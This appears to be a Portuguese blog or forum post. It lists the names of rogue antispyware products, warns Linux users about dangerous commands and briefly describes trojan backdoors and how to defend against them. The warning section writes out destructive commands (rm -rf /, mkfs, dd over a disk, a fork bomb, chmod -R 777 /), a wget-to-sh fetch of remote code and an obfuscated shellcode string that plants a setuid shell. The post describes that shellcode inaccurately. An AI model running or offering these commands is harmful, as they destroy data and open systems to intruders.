    ---- O ----

    • Online Privacy Pro
    • OnlineGuard
    • OrantieSpion
    • OSBOdyGuard
    • Oxford Spyware Remover

    ---- P ----

    • Page Cannot Be Displayed
    • PAL Emergency Response
    • PAL Spyware Remover
    • PC AdWare SpyWare Removal
    • PC Error Eliminator
    • PC Health Plan
    • Pc-Antispyware
    • PCArmor
    • Pc-Cleaner
    • PCCleaner 2007
    • pcOrion
    • PcSecureSystem
    • PCSleek Error Cleaner
    • PCPrivacyCleaner
    • PerfectCleaner
    • PerformanceOptimizer
    • PestBot
    • PestCapture
    • PestProtector
    • PestTrap
    • PestSweeper
    • PestWiper
    • PornoPlayer
    • Privacy Champion
    • Privacy Crusader
    • Privacy Defender
    • Privacy Fusion
    • Privacy Keeper
    • Privacy Redeemer
    • Privacy Tools 2004
    • PrivacyCrusader
    • PrivacyProtector
    • PrivacyRedeemer
    • PrivacyWatcher
    • ProAntiSpy
    • Protect Your Identity
    • ProtectingTool
    • PSGuard
    • PureSafetyHere
    • PurityScan / PuritySweep
    • PSguard

    ---- Q ----

    • QuickCleaner

    ---- R ----

    • RaptorDefence
    • RazeSpyware
    • Real AdWareRemoverGold
    • Real Antivirus
    • Real AntiSpyware
    • RealAV
    • RebrandSoft AdwareSpyware Remover
    • RegFreeze
    • Registry Cleaner
    • Registry Doc 2006
    • Registry Doctor
    • Registry Fix It
    • Registry Optimizer 2007
    • Registry Repair 2006
    • RegistryCare
    • RegistryCleanerXP
    • RegistryCleanFixer
    • RemedyAntiSpy
    • RemoveIT Pro
    • RescateDeAmenazas
    • Restore My Files

    ---- S ----

    • Safe & Clean (Scan & Clean)
    • SafeAndClean
    • SafePcTool
    • SaferScan
    • SafeStrip
    • SafeWebSurfer
    • SamuraiSpy
    • Scan & Repair Utilities 2006
    • Scan and Repair Utilities 2007
    • ScanSpyware
    • Scumware-Remover
    • SearchAndDestroy
    • SecureMyPC
    • Security iGuard
    • SiteTicket
    • SlimShield
    • SmartSecurity
    • Smitfraud
    • Seekmo
    • SpamBlockerUtility
    • SpamBlockerUtility
    • SpwareRemoval
    • SpwareRemover
    • Spy Analyst
    • Spy Annihilator
    • Spy Cleaner Platinum
    • Spy Crusher
    • Spy Defence
    • Spy Detector
    • Spy Emergency 2005
    • Spy Guardian Pro
    • Spy iBlock
    • Spy Officer
    • Spy Reaper
    • Spy Shredder
    • Spy Sniper
    • Spy Sniper Pro
    • Spy Sniper Pro
    • Spy Stalker
    • Spy-Ad Exterminator Pro
    • SpyAdvanced
    • SpyAssassin
    • SpyAssault
    • SpyAway
    • SpyAxe
    • SpyBan
    • SpyBeware
    • SpyBlast
    • Spy-Block
    • SpyBlocs/eBlocs.com
    • SpyBouncer
    • SpyBurn
    • SpyBuster
    • SpyButcher
    • SpyClean
    • SpyCleaner
    • SpyContra
    • Spy-Control
    • SpyCrush
    • SpyCut
    • SpyDawn
    • SpyDeface
    • SpyDeleter
    • SpyDemolisher
    • SpyDestroy Pro
    • SpyDoctor
    • SpyEliminator
    • SpyFalcon
    • SpyFerret
    • SpyFighter
    • SpyFighterPro
    • SpyFirewall
    • SpyFlusher
    • SpyGuardian Pro
    • SpyGuarder
    • SpyHazard
    • SpyHeal
    • SpyHunter
    • SpyiBlock
    • SpyiKiller
    • Spyinator
    • Spy-Kill
    • SpyKiller
    • SpyKiller 2005
    • SpyKillerPro
    • SpyLax
    • SpyLocked
    • SpyMarshal
    • SpyMaxx
    • SpyNoMore
    • SpyOfficer
    • SpyOnThis
    • SpyOnThis
    • Spy-Out
    • SpyPry
    • SpyReaper
    • SpyRemover
    • Spy-Rid
    • SpySanitizer
    • SpySheriff
    • SpyShield
    • Spy-SHield
    • SpyShredder
    • SpySnipe
    • SpySoap
    • SpySoldier
    • SpySpotter
    • SpySquash
    • SpyStriker
    • SpyToaster
    • SpyTrooper
    • SpyVampire
    • SpyVest
    • SpyViper
    • Spyware & Adware Removal
    • Spyware & Pest Remover
    • Spyware & Pop-Up Utility
    • Spyware Annihilator
    • Spyware Annihilator Pro
    • Spyware B1aster
    • Spyware Bomber
    • Spyware C.O.P.
    • Spyware Catch
    • Spyware Cleaner
    • Spyware Cleaner & Pop-Up Blocker
    • Spyware Cops
    • Spyware Defense
    • Spyware Destroyer
    • Spyware Detector
    • Spyware Disinfector
    • Spyware Hospital
    • Spyware Immobilizer
    • Spyware IT
    • SpyWare Killer
    • Spyware Knight
    • Spyware Medic
    • Spyware Nuker
    • Spyware Nuker XT
    • Spyware Protection Pro
    • Spyware Quake
    • Spyware Removal Wizard
    • Spyware Remover (alwaysfreealways)
    • Spyware Remover (SpyAdvanced)
    • Spyware Scrapper
    • SpyWare Secure
    • Spyware Seizer
    • Spyware Sheriff
    • Spyware Shield
    • Spyware Slayer
    • Spyware Sledgehammer
    • Spyware Snooper
    • Spyware Soft Stop
    • Spyware Stormer
    • Spyware Striker Pro
    • Spyware Suite 2005
    • Spyware Terminator 4 (de Invender.nl)
    • Spyware Vanisher
    • Spyware Wizard
    • SpywareAnnihilatorPro
    • SpywareAssassin
    • SpywareAvenger
    • SpywareBeGone
    • SpywareBomb
    • SpywareBot
    • SpywareButcher
    • SpywareCleaner
    • SpywareCrusher
    • SpywareDetector
    • SpywareFlusher
    • SpywareHound
    • SpywareHeal
    • SpywareIsolator
    • SpywareKill
    • SpywareKilla
    • SpywareKnight
    • SpywareLocked
    • SpywareLocker
    • SpywareNo!
    • SpywarePolice
    • SpywarePro
    • SPYwareRemover
    • SpywareScanner 2008
    • SpywareScrub
    • Spyware-Secure
    • SpywareSeeker
    • SpywareShield
    • SpywareSoftStop
    • SpywareSquash
    • SpywareSterilizer
    • SpywareStop
    • Spyware-Stop
    • SpywareStrike
    • Spyware-Sweeper
    • SpywareSweeperPro
    • SpywareTek / Spyware Removal System
    • SpywareThis
    • SpywareWipe
    • SpywareXP
    • SpywareZapper
    • SpyWatchE
    • SpyWiper
    • StartGuard
    • starware
    • StopGuard
    • StopingSpy
    • StopItBlockIt 2005
    • StorageProtector
    • SunShine Spy
    • SunShineSpy
    • Super Spyware Remover
    • SuperSpywareKiller
    • SwiftCleaner
    • SysKontroller
    • SysProtect
    • System Detective
    • System doctor
    • System Live Protect
    • SystemDefender
    • SystemDoctor 2006
    • SystemErrorFixer
    • SystemGuard
    • SystemStable

    ---- T ----

    • TeoSoft Anti-Spyware
    • Terminexor
    • The Adware Hunter
    • The SpyGuard
    • The Spyware Detective
    • The Spyware Shield
    • The Ultimate Spyware Adware Remover
    • The Web Shield
    • TheSpyBot
    • TheSpywareKiller
    • Titan AntiSpyware
    • TitanShield AntiSpyware
    • Top10Reviews SpyScan
    • Trojan Guarder Gold
    • TrojanerFilter
    • TrojansFilter
    • TrojansFiltre
    • TrojansKiller
    • True Sword
    • TrueWatch
    • Trust Cleaner
    • TrustedAntivirus
    • TrustedProtection
    • TrustSoft AntiSpyware
    • TZ Spyware Adware Remover
    • TZ Spyware Remover

    ---- U ----

    • UControl
    • Ultimate Cleaner
    • Ultimate Defender
    • Ultimate Fixer 2007
    • UltimateCleaner
    • UltimateCleaner 2007
    • Ultimatefixer2007
    • Ultimate-Spyware Adware Remover
    • Unigray
    • UnSpyPC

    ---- V ----

    • VBouncer/AdDestroyer
    • VIPAntiSpyware
    • VirusAlarma
    • VirusBlast
    • VirusBlaster
    • VirusBlasters
    • VirusBurst
    • VirusBursters
    • VirusEffaceur
    • VirusGuard
    • VirusHeal
    • Virus-Kill
    • VirusLocker
    • VirusProtect
    • VirusProtectPro 3.3, 3.4, 3.5, 3.6 3.7
    • VirusRanger
    • VirusRay
    • VirusRescue
    • VirusRescue
    • Virusschlacht
    • VistaAntivirus 2008

    ---- W ----

    • WareOut Spyware Remover
    • WebSafe Spyware Secure
    • WebSpyShield
    • WinAntiSpyware 2005 / 2006 / 2007 / 2008
    • WinAntispyware 2008
    • WinAntivirus 2005 / 2006 / 2007 / 2008
    • WinAntiVirus Pro 2006
    • Winantivirus pro 2007
    • Wincleaner AntiSpyware
    • WinFix Master
    • WinFixer
    • WinFixer 2005
    • WinFixMaster / WinFix Master
    • Winhound Spyware Remover
    • Winkeeper
    • WinPerformance
    • Winreanimator
    • winsecureav
    • WinSecureAv
    • WinSecureDisc
    • WinSpywareProtect
    • WinSOS
    • WinSpyControl
    • WinSpyKiller
    • WinXDefender
    • WinX Security Center 2.2
    • Winxprotector
    • WorldAntiSpy

    ---- X ----

    • XpCleanerPro
    • X-Con Spyware Destroyer
    • Xmembytes AntiSpyware
    • XP Antivirus 2008
    • XPAntivirus
    • XpAntiVirus
    • XpCleanerPro
    • X-Spyware
    • Xspyware
    • XSRemover
    • XXXAccess

    ---- Y ----

    • YourPrivacyGuard

    ---- Z ----

    • zlob
    • zango search
    • ZeroSpyware
    • ZoneProtect AntiSpyware
    • Zinaps Anti-Spyware 7.0

    Fonte : http://www.seguridad-informatica.cl/foros/index.php/topic,28.msg93.html#msg93

    Para quem usa linux cuidado


    Descobri o que não deve ser nenhuma novidade para alguns codifgos mortais do linux vejam:


    rm -rf /

    Este comando eliminará toda a informação do directório Root.

    - char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Este comando faz precisamente o mesmo do primeiro, a única diferença consiste no facto de ser mais discreto. Mesmo os utilizadores mais habituados ao sistema Linux, podem não reconhecer o comando.

    - mkfs.ext3 /dev/das

    Este comando irá eliminar ou reformatar toda a informação existente no dispositivo indicado após o comando mkfs.

    - :(){ :|:& };:

    Este comando leva o sistema ao limite. Mais conhecido por “forkbomb” este comando indica ao sistema que efectue o maior número de processos até que o sistema crash. Além de todos os constrangimentos causados por este comando, pode também causar danos ao corromper a informação.

    - chmod -R 777 /

    Este comando permite a um outro utilizador ter privilégios de ler, escrever e executar (“Read, Write, Execute”). Os únicos ficheiros que “escapam” a este comando, são os ficheiros “/bin” e “/etc/bin” pois encontram-se em processamento.

    - wget http://codigomalicioso -O- | sh

    Este comando faz com que o sistema efectue um download de um código malicioso e o instale na sua máquina. Como é fácil de prever, tudo será possível acontecer a partir desse momento.

    O último comando é o mais destrutivo de todos, pois faz com que o disco seja formatado e fique tal e qual como vem de fábrica.

    - dd if=/dev/zero of=/dev/sda

    Espero que com este artigo os menos experientes ou conhecedores dos sistemas Linux fiquem mais protegidos contra ataques. Por isso tenham cuidado ao executar este codigos.

    Trojan Backdoor





    Controlados por crackers atravez de falhas de programas ou no sistema operacional, permite que a maquina seje controlada pelo cracker. Este pode fazer muitas coisas que acabam por ser perigosas como:
    • Visualizar arquivos da vítima
    • Ver imagens pela webcam (activando-a sem o conhecimento da vítima)
    • Ligar o microfone
    • Abrir e fechar a drive
    • Instalar software malicioso
    As portas 666, 888 e 3333 são muito utilizadas por Backdoors para ter acesso ao computador.
    Existem metodos eficazes de impedir que entrem no vosso computador.

    • Sistema operacional actualizado (para fechar falhas de segurança conhecidas)
    • Um bom firewall (não confie muito no firewall do windows)
    • IDS (Sistema de detecção de intrusos, são meios tecnicos para se descobrir acessos não autorizados a rede, o que pode indicar a existencia de algum Hacker)